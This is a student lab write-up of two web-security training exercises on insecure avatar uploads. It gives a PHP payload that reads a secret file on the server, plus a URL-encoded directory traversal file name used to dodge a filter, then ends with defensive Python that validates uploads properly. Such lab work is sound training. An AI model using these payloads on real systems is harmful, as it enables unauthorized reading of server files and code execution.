(IAW301) (Lab19) NguyenLamGiaBao

The document outlines a series of steps for exploiting a web application vulnerability related to file uploads. It details how to upload a PHP file disguised as an avatar to access sensitive information from the server. The process involves using tools like Burp Suite to manipulate HTTP requests and responses to achieve the exploit.

Nguyen Lam Gia Bao

CE170444
IAW301-Lab19
Ex 1:

1/ Access the lab


2/ Log in with the given credentials wiener:peter

3/ Upload any picture and go back to the account page. Notice that a preview of the avatar is displayed.
4/ In Burp, go to Proxy > HTTP history. Click 'Filter' to open the HTTP history filter. Under "Filter by MIME type", tick Images, then click "Apply & close".
5/ Send the request GET /files/avatars/<YOUR-IMAGE> to Repeater.

6/ Create a file named 'exploit.php' with the content shown below:

<?php echo file_get_contents('/home/carlos/secret'); ?>


7/ Upload the PHP file through the avatar upload.

8/ In Burp Repeater, change the URL to your PHP file:


GET /files/avatars/exploit.php
9/ Send the request; the response will show the content of the 'secret' file.
10/ Use the content above to solve the lab.

Ex 2:

1/ Access the lab


2/ Log in, upload an avatar, and go back to the account page.
3/ Send the request GET /files/avatars/<YOUR-IMAGE> to Repeater.

4/ Create a file named 'exploit.php' with the content shown below:

<?php echo file_get_contents('/home/carlos/secret'); ?>


5/ Upload the PHP file through the avatar upload. Notice that the site does not seem to block PHP files.
6/ In Repeater, go to the tab containing GET /files/avatars/<YOUR-IMAGE>. Change the URL to exploit.php and send. This time, instead of executing the file and returning the result, the response shows the source of the PHP file.
7/ Find the request POST /my-account/avatar and send it to Repeater.
8/ In Repeater, go to the tab containing the request POST /my-account/avatar. In the Content-Disposition header, rename the file to include a directory traversal sequence:
Content-Disposition: form-data; name="avatar"; filename="../exploit.php"
9/ Send the request. The response says that the file avatars/exploit.php has been uploaded. This indicates that the server is removing the directory traversal sequence from the file name.
10/ Obfuscate the directory traversal sequence by URL-encoding the slash character (/), resulting in:
filename="..%2fexploit.php"
11/ Send the request and observe that the message now says that the file avatars/../exploit.php has been uploaded. This indicates that the file name is being URL-decoded by the server after the traversal sequence has been stripped.
12/ Go back to the account page.
13/ Right-click the avatar image and select "Open image in new tab".
14/ Change the URL to https://.../files/exploit.php
15/ Submit the content shown above to solve the lab.
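The server-side flaw seen in steps 9 to 11 is an ordering bug: the traversal sequence is stripped from the file name before the name is URL-decoded, so the decoded result reintroduces it. The following is an added Python example, not part of this write-up or of the target application, contrasting that weak order of operations with a handler that decodes first and then validates the decoded name against an image-extension allow-list and a directory containment check; the function names, the allow-list and the avatars directory are assumptions.

```python
import os
from urllib.parse import unquote

ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}  # constructed allow-list


def weak_sanitize(filename: str) -> str:
    """Flawed order from the lab: strip '../' first, URL-decode second.
    '..%2fexploit.php' survives the strip and decodes back to '../exploit.php'."""
    stripped = filename.replace("../", "")
    return unquote(stripped)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so double encoding
    such as '%252f' cannot hide a separator from the later checks."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def hardened_filename(filename: str) -> str:
    """Decode first, then validate the decoded name as one plain path segment
    with an allow-listed image extension. Raises ValueError otherwise."""
    name = fully_decode(filename)
    if "/" in name or "\\" in name or "\0" in name:
        raise ValueError("path separators or NUL bytes not allowed")
    if name in ("", ".", ".."):
        raise ValueError("not a plain file name")
    _, ext = os.path.splitext(name.lower())
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} not allowed")
    return name


def destination_path(avatar_dir: str, filename: str) -> str:
    """Join the validated name onto avatar_dir and confirm the resolved path
    is still inside that directory (defence in depth behind hardened_filename)."""
    target = os.path.realpath(os.path.join(avatar_dir, hardened_filename(filename)))
    root = os.path.realpath(avatar_dir)
    if os.path.commonpath([root, target]) != root:
        raise ValueError("escaped avatar directory")
    return target


def is_rejected(filename: str) -> bool:
    """True when the hardened check refuses the supplied file name."""
    try:
        hardened_filename(filename)
    except ValueError:
        return True
    return False
```

Serving the avatar directory with script execution disabled and storing uploads under a server-generated name removes the remaining risk even if validation were bypassed.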
